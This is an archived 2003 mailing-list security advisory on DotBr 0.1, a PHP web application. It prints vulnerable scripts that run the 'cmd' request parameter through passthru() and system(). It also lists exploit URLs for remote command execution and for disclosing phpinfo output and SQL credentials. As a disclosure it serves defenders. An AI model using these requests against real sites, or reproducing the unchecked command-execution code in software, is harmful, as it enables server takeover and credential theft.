Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

DotBr (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 15 Feb 2003 10:55:19 +0100


Informations :
°°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Informations disclosure
- System commands execution


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------


config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name


admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
 if (!isset($sep)) {
   $sep = "_";
 }
 $cmd=str_replace($sep," ",$cmd);
 passthru($cmd,$ret);
 echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------


admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
 $cmd = str_replace("_"," ",$cmd);
 system($cmd,$result);
 echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]



More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n
http://www.phpsecure.org




_________________________________________________________________
Previous By Date Next
Previous By Thread Next

Current thread: